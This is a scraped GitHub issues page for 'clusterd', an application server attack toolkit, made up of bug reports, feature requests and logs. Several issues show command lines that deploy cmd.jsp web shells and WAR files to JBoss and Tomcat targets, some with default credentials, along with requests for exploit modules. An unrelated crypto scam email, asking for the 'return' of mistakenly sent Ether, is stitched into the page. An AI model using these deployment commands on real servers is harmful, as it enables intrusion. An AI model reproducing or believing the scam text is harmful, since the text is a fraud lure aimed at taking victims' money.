hatriot / clusterd Goto Github PK
View Code? Open in Web Editor NEWapplication server attack toolkit
License: MIT License
application server attack toolkit
License: MIT License
I used the payload generator, built a .war file then pointed it to a default tomcat installation. I get a ValueError back ...this is tomcat 5.5
details documented here:
http://pastebin.com/Aedr2zZy
If the remote system never responds or is invoked against Linux, the UNC listener just waits. The timeout should be based upon --timeout (default 5s)
Add a file upload function to cmd.jsp (external request)
The local_address function in utility.py strips off first two octets of the attack machine's IP. I have provided a fix in the the pull requests section.
I am not sure if the ColdFusion lfi stager exploit in clusterd uses cve-2010-2861 or if that is a separate vulnerability it uses, but if not I recommend a module that exploits cve-2010-2861 as it is a wide spread (many versions) vulnerability in CF and can be used to deploy code. Also it could also be used as an aux module to get credentials for a CF server so that's a double win vulnerability right there.
My os is Windows
Python 2.7.5
I try all and there are not change, ./src/lib/resources/cmd.jsp too.
Matched 3 fingerprints for service jboss
[2016-09-15 12:39AM] JBoss EJB Invoker Servlet (version Any)
[2016-09-15 12:39AM] JBoss JMX Invoker Servlet (version Any)
[2016-09-15 12:39AM] JBoss RMI Interface (version Any)
[2016-09-15 12:39AM] Fingerprinting completed.
[2016-09-15 12:39AM] Loading auxiliary for 'jboss'...
[2016-09-15 12:39AM] Loading deployers for platform jboss
[2016-09-15 12:39AM] Deploying WAR with deployer JBoss EJB Invoker Servlet (ejbinvokerservlet)
[2016-09-15 12:39AM] Preparing to deploy # src/lib/resources/cmd.jsp...
[2016-09-15 12:39AM] [Error 2] El sistema no puede encontrar el archivo especificado
[2016-09-15 12:39AM] [Error 2] El sistema no puede encontrar el archivo especificado
[2016-09-15 12:39AM] Finished at 2016-09-15 12:39AM
Hello,
Python 2.x will no longer be supported by their upstream developers in 2020. Thus Debian developers are actively removing Python 2 support in Debian Testing with the goal of getting rid of Python 2 in Debian 11 (bullseye).
Kali is tracking Debian Testing and is thus affected by this. You should consider to switch clusterd to Python 3.
FWIW this is tracked in https://gitlab.com/kalilinux/packages/clusterd/issues/1 on the Kali side.
Metasploit has removed msfcli/msfpayload and instead now use msfvenom. --gen-payload
uses msfpayload currently, but this needs to be updated to msfvenom.
Hi.
hatRiot, thank for your work!
$ pip install -r requirements.txt
Requirement already satisfied: requests>=2.2.1 in c:\python27\lib\site-packages (from -r requirements.txt (line 1))
Requirement already satisfied: idna<2.6,>=2.5 in c:\python27\lib\site-packages (from requests>=2.2.1->-r requirements.txt (line 1))
Requirement already satisfied: urllib3<1.22,>=1.21.1 in c:\python27\lib\site-packages (from requests>=2.2.1->-r requirements.txt (line 1))
Requirement already satisfied: chardet<3.1.0,>=3.0.2 in c:\python27\lib\site-packages (from requests>=2.2.1->-r requirements.txt (line 1))
Requirement already satisfied: certifi>=2017.4.17 in c:\python27\lib\site-packages (from requests>=2.2.1->-r requirements.txt (line 1))
Pedro@Pedro-PC MINGW64 /e/Python27/clusterd (master)
$ python clusterd.py -i x.x.x.x
clusterd/0.5 - clustered attack toolkit
[Supporting 7 platforms]
[2018-03-13 08:55PM] Started at 2018-03-13 08:55PM
Traceback (most recent call last):
File "clusterd.py", line 121, in
prerun(options)
File "clusterd.py", line 45, in prerun
mkdir(state.serve_dir)
WindowsError: [Error 3] Impossibile trovare il percorso specificato: '/tmp/.clusterd'
root@kali:~/clusterd# ./clusterd.py -i -p -a jboss -v 5 --deploy /root/redteam.war
clusterd/0.2 - clustered attack toolkit
Supporting jboss, coldfusion, weblogic, tomcat
[2014-03-06 03:51PM] Started at 2014-03-06 03:51PM
[2014-03-06 03:51PM] Servers' OS hinted at windows
[2014-03-06 03:51PM] Fingerprinting host 'REDACTED'
[2014-03-06 03:51PM] Server hinted at 'jboss'
[2014-03-06 03:51PM] Checking jboss version 5.1 JBoss Web Manager...
[2014-03-06 03:51PM] Checking jboss version 5.1 JBoss JMX Console...
[2014-03-06 03:51PM] Checking jboss version 5.1 JBoss Web Console...
[2014-03-06 03:51PM] Checking jboss version 5.0 JBoss JMX Console...
[2014-03-06 03:51PM] Checking jboss version 5.0 JBoss Web Console...
[2014-03-06 03:51PM] Checking jboss version Any JBoss EJB Invoker Servlet...
[2014-03-06 03:51PM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
[2014-03-06 03:51PM] Checking jboss version Any JBoss JMX Invoker Servlet...
[2014-03-06 03:51PM] Checking jboss version Any JBoss RMI Interface...
[2014-03-06 03:51PM] Checking jboss version Any JBoss Status Page...
[2014-03-06 03:51PM] Matched 2 fingerprints for service jboss
[2014-03-06 03:51PM] JBoss EJB Invoker Servlet (version Any)
[2014-03-06 03:51PM] JBoss JMX Invoker Servlet (version Any)
[2014-03-06 03:51PM] Fingerprinting completed.
[2014-03-06 03:51PM] Preparing to deploy /root/redteam.war...
Traceback (most recent call last):
File "./clusterd.py", line 115, in
run(options)
File "./clusterd.py", line 100, in run
auxengine(fingerengine)
File "/root/clusterd/src/core/auxengine.py", line 50, in auxengine
deployer.run(fingerengine)
File "/root/clusterd/src/core/deployer.py", line 47, in run
deployer.deploy(fingerengine, fingerprint)
File "/root/clusterd/src/platform/jboss/deployers/ejbinvokerservlet.py", line 24, in deploy
fp = [f for f in fingerengine.fingerprints if f.version != 'Any'][0]
IndexError: list index out of range
I am reaching out to you with a matter of great urgency regarding a recent Ether transaction to your digital wallet on the Dydx Exchange. Unfortunately, the transaction was completed unintentionally, and upon thorough review, we have identified the error.
I kindly request you to promptly check your digital wallet on Dydx Exchange to verify the receipt of the unintended Ether.
To address this matter swiftly, I propose the following resolution: a return of 90 percent of the received amount, with 10 percent retained as compensation.
Your understanding and immediate attention to this matter are highly appreciated. For any questions or additional clarification, please do not hesitate to contact us at [email protected].
Best regards,
John Glenn
When ever I run clusterd.py on archlinux I get this:
Traceback (most recent call last):
File "./clusterd.py", line 8, in
from fingerprint import FingerEngine
File "/home/bob/Toolz/clusterd/src/core/fingerprint.py", line 5, in
import utility
File "/home/bob/Toolz/clusterd/src/core/utility.py", line 21
print '\033[32m [%s] %s\033[0m' % (timestamp(), string)
I don't know if this is already possible but I think it would be ideal for clusterd to allow you to specify which IP or interface to listen on for the UNC connect back server. That way if you have multiple Internet facing interfaces you can make sure it communicates with the right one.
Ran into an issue that is 'sometimes' repeatable.
Working on a target of Tomcat 5.5; I'm seeing some inconsistent results. Sometimes I can deploy and invoke a payload just fine. Other times, I get this traceback:
It seems as a workaround, for some reason, I deploy war file on one command. Then invoke it on the next.
Several App servers were found to be vulnerable to java deserialization vulnerabilities The article below details exploitation for several app servers:
http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
If authentication is enabled on all exposed interfaces for a JBoss instance, we can still pull headers for the version. This isn't always entirely accurate, and I didn't include it for this very reason, but it's a good last resort indication.
Not sure which versions include the version in the header, but it should suffice for all versions 3.x-5.x, at least.
Identified a couple web managers (v5.1) that had default credentials.
When attempting to deploy, it says "No valid fingerprints to deploy".
I was able to deploy a WAR file manually through the web interface, so it should be possible to add a deployer to include in clusterd.
Is this a known issue, or am I doing something wrong?
I would be glad to help, by running my manual deployment through burp and providing you the HTTP traffic. Let me know.
Command and output below:
~/tools/clusterd# ./clusterd.py -i 127.0.0.1 -p 443 --ssl -a jboss -v5.1 --deploy ./src/lib/resources/cmd.war --usr-auth admin:admin
clusterd/0.4 - clustered attack toolkit
[Supporting 7 platforms]
[2015-04-10 12:13PM] Started at 2015-04-10 12:13PM
[2015-04-10 12:13PM] Servers' OS hinted at windows
[2015-04-10 12:13PM] Fingerprinting host '127.0.0.1'
[2015-04-10 12:13PM] Server hinted at 'jboss'
[2015-04-10 12:13PM] Checking jboss version 5.1 JBoss Web Manager...
[2015-04-10 12:13PM] Checking jboss version 5.1 JBoss JMX Console...
[2015-04-10 12:13PM] Checking jboss version 5.1 JBoss Web Console...
[2015-04-10 12:13PM] Checking jboss version Any JBoss EJB Invoker Servlet...
[2015-04-10 12:13PM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
[2015-04-10 12:13PM] Checking jboss version Any JBoss JMX Invoker Servlet...
[2015-04-10 12:13PM] Checking jboss version Any JBoss RMI Interface...
[2015-04-10 12:13PM] Checking jboss version Any JBoss Status Page...
[2015-04-10 12:13PM] Matched 2 fingerprints for service jboss
[2015-04-10 12:13PM] JBoss Web Manager (version 5.1)
[2015-04-10 12:13PM] JBoss HTTP Headers (Unreliable) (version 5.0)
[2015-04-10 12:13PM] Fingerprinting completed.
[2015-04-10 12:13PM] No valid fingerprints were found to deploy.
[2015-04-10 12:13PM] Finished at 2015-04-10 12:13PM
Add support for Oracle's Fusion middleware. Fingerprints and deployers can likely fall under WebLogic, as it harnesses WebLogic for the backend.
Should be pretty straightforward.
When the argument for a aux module is specified to clusterd it goes about fingerprinting the target server but does not execute the aux module example:
./clusterd.py -i [ip] -p 8080 -a tomcat --tc-ofetch
clusterd/0.3.1 - clustered attack toolkit
[Supporting 7 platforms]
[2014-07-23 02:49PM] Started at 2014-07-23 02:49PM
[2014-07-23 02:49PM] Servers' OS hinted at windows
[2014-07-23 02:49PM] Fingerprinting host '[ip]'
[2014-07-23 02:49PM] Server hinted at 'tomcat'
[2014-07-23 02:49PM] Checking tomcat version 3.3 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 3.3 Tomcat Admin...
[2014-07-23 02:49PM] Checking tomcat version 4.0 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 4.1 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 4.1 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 4.0 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 5.0 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 5.5 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 5.5 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 5.0 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 6.0 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 6.0 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 7.0 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 7.0 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 8.0 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 8.0 Tomcat Manager...
[2014-07-23 02:49PM] Matched 1 fingerprints for service tomcat
[2014-07-23 02:49PM] Tomcat (version 5.0)
[2014-07-23 02:49PM] Fingerprinting completed.
[2014-07-23 02:49PM] Finished at 2014-07-23 02:49PM
Notice that the tomcat credential fetcher did not execute
I hard code quite a few strings (stuff like platform names, versions, etc). These should be extrapolated to enums so we can quickly add/remove/change strings/lists at will. sqlmap has an enum for absolutely everything, but if they need to change something, it's all in one place.
An example of this was when Coldfusion 11 support was added. It'd be easy to modify a single string.
msfpayload and msfencode both were removed and msfvenom took it's place, any chance to update the code to support this
Was unable to work against a version of JMX, not sure why:
root@kali:~/git/clusterd# ./clusterd.py -i x -p 8000 --fingerprint --deploy /usr/share/webshells/jsp/cmdjsp.jsp --deployer ejbinvokerservlet
clusterd/0.3 - clustered attack toolkit
[Supporting 6 platforms]
[2014-05-16 11:51AM] Started at 2014-05-16 11:51AM
[2014-05-16 11:51AM] Servers' OS hinted at windows
[2014-05-16 11:51AM] Fingerprinting host 'x'
[2014-05-16 11:51AM] Checking jboss version 3.2 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 3.2 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 3.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 4.2 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 4.2 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 4.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 4.0 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 5.1 JBoss Web Manager...
[2014-05-16 11:51AM] Checking jboss version 5.1 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 5.1 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 5.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 5.0 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 6.0 JBoss Web Manager...
[2014-05-16 11:51AM] Checking jboss version 6.1 JBoss Web Manager...
[2014-05-16 11:51AM] Checking jboss version 6.1 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 6.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 7.1 JBoss Management...
[2014-05-16 11:51AM] Checking jboss version 7.0 JBoss Management...
[2014-05-16 11:51AM] Checking jboss version 8.0 JBoss Management...
[2014-05-16 11:51AM] Checking jboss version Any JBoss EJB Invoker Servlet...
[2014-05-16 11:51AM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
[2014-05-16 11:51AM] Checking jboss version Any JBoss JMX Invoker Servlet...
[2014-05-16 11:51AM] Checking jboss version Any JBoss RMI Interface...
[2014-05-16 11:51AM] Checking jboss version Any JBoss Status Page...
[2014-05-16 11:51AM] Matched 4 fingerprints for service jboss
[2014-05-16 11:51AM] JBoss EJB Invoker Servlet (version Any)
[2014-05-16 11:51AM] JBoss HTTP Headers (Unreliable) (version 5.0)
[2014-05-16 11:51AM] JBoss JMX Invoker Servlet (version Any)
[2014-05-16 11:51AM] JBoss Status Page (version Any)
[2014-05-16 11:51AM] Fingerprinting completed.
[2014-05-16 11:51AM] Preparing to deploy /usr/share/webshells/jsp/cmdjsp.jsp...
Invocation Exception
org.jboss.invocation.InvocationException
at org.jboss.invocation.http.servlet.InvokerServlet.processRequest(InvokerServlet.java:188)
at org.jboss.invocation.http.servlet.InvokerServlet.doPost(InvokerServlet.java:224)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:637)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:235)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:191)
at org.jboss.web.tomcat.security.SecurityAssociationValve.invoke(SecurityAssociationValve.java:190)
at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:433)
at org.jboss.web.tomcat.security.JaccContextValve.invoke(JaccContextValve.java:92)
at org.jboss.web.tomcat.security.SecurityContextEstablishmentValve.process(SecurityContextEstablishmentValve.java:126)
at org.jboss.web.tomcat.security.SecurityContextEstablishmentValve.invoke(SecurityContextEstablishmentValve.java:70)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)
at org.jboss.web.tomcat.service.jca.CachedConnectionValve.invoke(CachedConnectionValve.java:158)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:109)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:330)
at org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:829)
at org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler.process(Http11Protocol.java:598)
at org.apache.tomcat.util.net.JIoEndpoint$Worker.run(JIoEndpoint.java:447)
at java.lang.Thread.run(Thread.java:619)
[2014-05-16 11:51AM] Finished at 2014-05-16 11:51AM
root@kali:~/git/clusterd# ./clusterd.py -i x -p 8000 --fingerprint --deploy /usr/share/webshells/jsp/cmdjsp.jsp --deployer jmxinvokerservlet
clusterd/0.3 - clustered attack toolkit
[Supporting 6 platforms]
[2014-05-16 11:51AM] Started at 2014-05-16 11:51AM
[2014-05-16 11:51AM] Servers' OS hinted at windows
[2014-05-16 11:51AM] Fingerprinting host 'x'
[2014-05-16 11:51AM] Checking jboss version 3.2 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 3.2 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 3.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 4.2 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 4.2 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 4.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 4.0 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 5.1 JBoss Web Manager...
[2014-05-16 11:51AM] Checking jboss version 5.1 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 5.1 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 5.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 5.0 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 6.0 JBoss Web Manager...
[2014-05-16 11:51AM] Checking jboss version 6.1 JBoss Web Manager...
[2014-05-16 11:51AM] Checking jboss version 6.1 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 6.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 7.1 JBoss Management...
[2014-05-16 11:51AM] Checking jboss version 7.0 JBoss Management...
[2014-05-16 11:51AM] Checking jboss version 8.0 JBoss Management...
[2014-05-16 11:51AM] Checking jboss version Any JBoss EJB Invoker Servlet...
[2014-05-16 11:51AM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
[2014-05-16 11:51AM] Checking jboss version Any JBoss JMX Invoker Servlet...
[2014-05-16 11:51AM] Checking jboss version Any JBoss RMI Interface...
[2014-05-16 11:51AM] Checking jboss version Any JBoss Status Page...
[2014-05-16 11:51AM] Matched 4 fingerprints for service jboss
[2014-05-16 11:51AM] JBoss EJB Invoker Servlet (version Any)
[2014-05-16 11:51AM] JBoss HTTP Headers (Unreliable) (version 5.0)
[2014-05-16 11:51AM] JBoss JMX Invoker Servlet (version Any)
[2014-05-16 11:51AM] JBoss Status Page (version Any)
[2014-05-16 11:51AM] Fingerprinting completed.
[2014-05-16 11:51AM] Preparing to deploy /usr/share/webshells/jsp/cmdjsp.jsp...
Exception in thread "main" java.lang.ClassNotFoundException: javax.servlet.ServletException
at java.net.URLClassLoader$1.run(URLClassLoader.java:217)
at java.security.AccessController.doPrivileged(Native Method)
at java.net.URLClassLoader.findClass(URLClassLoader.java:205)
at java.lang.ClassLoader.loadClass(ClassLoader.java:323)
at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:294)
at java.lang.ClassLoader.loadClass(ClassLoader.java:268)
at java.lang.Class.forName0(Native Method)
at java.lang.Class.forName(Class.java:270)
at java.io.ObjectInputStream.resolveClass(ObjectInputStream.java:624)
at org.jboss.invocation.MarshalledValueInputStream.resolveClass(MarshalledValueInputStream.java:109)
at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1611)
at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1516)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1770)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1349)
at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:1989)
at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1914)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1797)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1349)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:369)
at org.jboss.invocation.MarshalledValue.get(MarshalledValue.java:91)
at invkdeploy.main(invkdeploy.java:151)
[2014-05-16 11:51AM] Finished at 2014-05-16 11:51AM
The metasploit 'check' function identified it as SVNTag=JBoss_5_but also failed :)
wrong repo- see hatRiot/zarp#26
Doesn't conform to programming standards -- please camel case and resubmit.
I have tried both:
./clusterd.py -i 192.168.56.102 -p 8080 --deployer dfs_deploy --deploy ~/test.war --invoke which gives the following output and deploys the jsp command shell but does not invoke or deploy my war file
[2014-06-27 05:42PM] Started at 2014-06-27 05:42PM
[2014-06-27 05:42PM] Servers' OS hinted at windows
[2014-06-27 05:42PM] Fingerprinting host '192.168.56.102'
[2014-06-27 05:42PM] Checking jboss version 3.2 JBoss JMX Console...
[2014-06-27 05:42PM] Checking jboss version 3.2 JBoss Web Console...
[2014-06-27 05:42PM] Checking jboss version 3.0 JBoss JMX Console...
[2014-06-27 05:42PM] Checking jboss version 4.2 JBoss JMX Console...
[2014-06-27 05:42PM] Checking jboss version 4.2 JBoss Web Console...
[2014-06-27 05:42PM] Checking jboss version 4.0 JBoss JMX Console...
[2014-06-27 05:42PM] Checking jboss version 4.0 JBoss Web Console...
[2014-06-27 05:42PM] Checking jboss version 5.1 JBoss Web Manager...
[2014-06-27 05:42PM] Checking jboss version 5.1 JBoss JMX Console...
[2014-06-27 05:42PM] Checking jboss version 5.1 JBoss Web Console...
[2014-06-27 05:42PM] Checking jboss version 5.0 JBoss JMX Console...
[2014-06-27 05:42PM] Checking jboss version 5.0 JBoss Web Console...
[2014-06-27 05:42PM] Checking jboss version 6.0 JBoss Web Manager...
[2014-06-27 05:42PM] Checking jboss version 6.1 JBoss Web Manager...
[2014-06-27 05:42PM] Checking jboss version 6.1 JBoss JMX Console...
[2014-06-27 05:42PM] Checking jboss version 6.0 JBoss JMX Console...
[2014-06-27 05:42PM] Checking jboss version 7.1 JBoss Management...
[2014-06-27 05:42PM] Checking jboss version 7.0 JBoss Management...
[2014-06-27 05:42PM] Checking jboss version 8.1 JBoss Management...
[2014-06-27 05:42PM] Checking jboss version 8.0 JBoss Management...
[2014-06-27 05:42PM] Checking jboss version Any JBoss EJB Invoker Servlet...
[2014-06-27 05:42PM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
[2014-06-27 05:42PM] Checking jboss version Any JBoss JMX Invoker Servlet...
[2014-06-27 05:42PM] Checking jboss version Any JBoss RMI Interface...
[2014-06-27 05:42PM] Checking jboss version Any JBoss Status Page...
[2014-06-27 05:42PM] Matched 7 fingerprints for service jboss
[2014-06-27 05:42PM] JBoss JMX Console (version 4.2)
[2014-06-27 05:42PM] JBoss Web Console (version 4.2)
[2014-06-27 05:42PM] JBoss EJB Invoker Servlet (version Any)
[2014-06-27 05:42PM] JBoss HTTP Headers (Unreliable) (version 4.2)
[2014-06-27 05:42PM] JBoss JMX Invoker Servlet (version Any)
[2014-06-27 05:42PM] JBoss RMI Interface (version Any)
[2014-06-27 05:42PM] JBoss Status Page (version Any)
[2014-06-27 05:42PM] Fingerprinting completed.
[2014-06-27 05:42PM] This deployer requires a JSP, default to cmd.jsp? [Y/n] > y
[2014-06-27 05:42PM] Preparing to deploy cmd...
[2014-06-27 05:42PM] Successfully deployed '/cmd/cmd.jsp'
[2014-06-27 05:42PM] Finished at 2014-06-27 05:42PM
I also tried using EJB: ./clusterd.py -i 192.168.56.102 -p 8080 --deployer ejbinvokerservlet --deploy ~/test.war --invoke
clusterd/0.3.1 - clustered attack toolkit
[Supporting 6 platforms]
[2014-06-27 05:36PM] Started at 2014-06-27 05:36PM
[2014-06-27 05:36PM] Servers' OS hinted at windows
[2014-06-27 05:36PM] Fingerprinting host '192.168.56.102'
[2014-06-27 05:36PM] Checking jboss version 3.2 JBoss JMX Console...
[2014-06-27 05:36PM] Checking jboss version 3.2 JBoss Web Console...
[2014-06-27 05:36PM] Checking jboss version 3.0 JBoss JMX Console...
[2014-06-27 05:36PM] Checking jboss version 4.2 JBoss JMX Console...
[2014-06-27 05:36PM] Checking jboss version 4.2 JBoss Web Console...
[2014-06-27 05:36PM] Checking jboss version 4.0 JBoss JMX Console...
[2014-06-27 05:36PM] Checking jboss version 4.0 JBoss Web Console...
[2014-06-27 05:36PM] Checking jboss version 5.1 JBoss Web Manager...
[2014-06-27 05:36PM] Checking jboss version 5.1 JBoss JMX Console...
[2014-06-27 05:36PM] Checking jboss version 5.1 JBoss Web Console...
[2014-06-27 05:36PM] Checking jboss version 5.0 JBoss JMX Console...
[2014-06-27 05:36PM] Checking jboss version 5.0 JBoss Web Console...
[2014-06-27 05:36PM] Checking jboss version 6.0 JBoss Web Manager...
[2014-06-27 05:36PM] Checking jboss version 6.1 JBoss Web Manager...
[2014-06-27 05:36PM] Checking jboss version 6.1 JBoss JMX Console...
[2014-06-27 05:36PM] Checking jboss version 6.0 JBoss JMX Console...
[2014-06-27 05:36PM] Checking jboss version 7.1 JBoss Management...
[2014-06-27 05:36PM] Checking jboss version 7.0 JBoss Management...
[2014-06-27 05:36PM] Checking jboss version 8.1 JBoss Management...
[2014-06-27 05:36PM] Checking jboss version 8.0 JBoss Management...
[2014-06-27 05:36PM] Checking jboss version Any JBoss EJB Invoker Servlet...
[2014-06-27 05:36PM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
[2014-06-27 05:36PM] Checking jboss version Any JBoss JMX Invoker Servlet...
[2014-06-27 05:36PM] Checking jboss version Any JBoss RMI Interface...
[2014-06-27 05:36PM] Checking jboss version Any JBoss Status Page...
[2014-06-27 05:36PM] Matched 7 fingerprints for service jboss
[2014-06-27 05:36PM] JBoss JMX Console (version 4.2)
[2014-06-27 05:36PM] JBoss Web Console (version 4.2)
[2014-06-27 05:36PM] JBoss EJB Invoker Servlet (version Any)
[2014-06-27 05:36PM] JBoss HTTP Headers (Unreliable) (version 4.2)
[2014-06-27 05:36PM] JBoss JMX Invoker Servlet (version Any)
[2014-06-27 05:36PM] JBoss RMI Interface (version Any)
[2014-06-27 05:36PM] JBoss Status Page (version Any)
[2014-06-27 05:36PM] Fingerprinting completed.
[2014-06-27 05:36PM] Preparing to deploy /home/bob/test.war...
[2014-06-27 05:36PM] This deployer requires a JSP, default to cmd.jsp? [Y/n] > y
[2014-06-27 05:36PM] cmd deployed to 192.168.56.102 (/cmd160)
[2014-06-27 05:36PM] Finished at 2014-06-27 05:36PM
Neither works in executing the war file.
It would be wicked to see some Windows love.
After installing requests, I get an initial traceback:
C:\Tools\clusterd>python clusterd.py
←[32m
clusterd/0.3.1 - clustered attack toolkit←[0m
←[33m[Supporting 6 platforms]←[0m
Traceback (most recent call last):
File "clusterd.py", line 108, in <module>
options = parse(sys.argv[1:])
File "C:\Tools\clusterd/src/core/parse_cmd.py", line 92, in parse
group = build_platform_flags(platform, group)
File "C:\Tools\clusterd/src/core/auxengine.py", line 65, in build_platform_flags
mod = auxiliary[0].find_module(auxiliary[1]).load_module(auxiliary[1])
File "C:\Python27\lib\pkgutil.py", line 246, in load_module
mod = imp.load_module(fullname, self.file, self.filename, self.etc)
File "C:\Tools\clusterd\src\platform\jboss\auxiliary\smb_hashes.py", line 8, in <module>
from os import getuid
ImportError: cannot import name getuid
I saw you mention an option called --verb-tamper in order to bypass jboss 4.X auth
but in the help itself there is no mentioning how to use this option.
can you please give more details regarding on how to use it?
Hi,
First of all, congrats for the awesome tool.
I'm doing an internal pentest at the moment, and I've found a JBoss 5.1.0 GA which in theory is vulnerable to the invoker/JMXInvokerServlet and invoker/EJBInvokerServlet vulnerability. At first I tried to exploit it using the metasploit module, and then a similar PHP exploit I found on EDB, but both were failing for some reason. As I'm already domain admin, I could log to the box and see the logs, it turns out it was complaining about the remote .war file I was trying to upload and deploy, as it was hosted on my own web server. After doing some research I found this article: http://breenmachine.blogspot.co.uk/2014/02/jboss-jbxinvoker-servlet-update.html which comes to say that JBoss >= has a bug/feature that stops remote objects from being deployed. I read his post, compiled the Java exploit and ran it. It did upload my .war file to the folder /management (...management/cmd.war), but for some reason it seems as if it doesn't deploy it!!.
After that, I found this project, gave it a go, and the result is the same, your tool does upload the .war file, but it is never deployed for some reason I can't understand!.
Any ideas?
Can a module be added to implement this invoker for jboss http://www.exploit-db.com/exploits/28713/? Some sys admins restrict /invoker/JMXInvokerServlet/ but not /invoker/EJBInvokerServlet/ so it would be good to have a module to exploit that.
rewrite clusterd in powershell
Would be cool to see Clusterd print applicable auxiliary modules after fingerprinting a server, based upon said server's version. That is, something like:
[2014-07-23 02:49PM] Started at 2014-07-23 02:49PM
[2014-07-23 02:49PM] Servers' OS hinted at windows
[2014-07-23 02:49PM] Fingerprinting host '[ip]'
[2014-07-23 02:49PM] Server hinted at 'tomcat'
[2014-07-23 02:49PM] Checking tomcat version 3.3 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 3.3 Tomcat Admin...
[2014-07-23 02:49PM] Checking tomcat version 4.0 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 4.1 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 4.1 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 4.0 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 5.0 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 5.5 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 5.5 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 5.0 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 6.0 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 6.0 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 7.0 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 7.0 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 8.0 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 8.0 Tomcat Manager...
[2014-07-23 02:49PM] Matched 1 fingerprints for service tomcat
[2014-07-23 02:49PM] Tomcat (version 5.0)
[2014-07-23 02:49PM] Available Modules:
[2014-07-23 02:49PM] X...
[2014-07-23 02:49PM] Y...
[2014-07-23 02:49PM] Z...
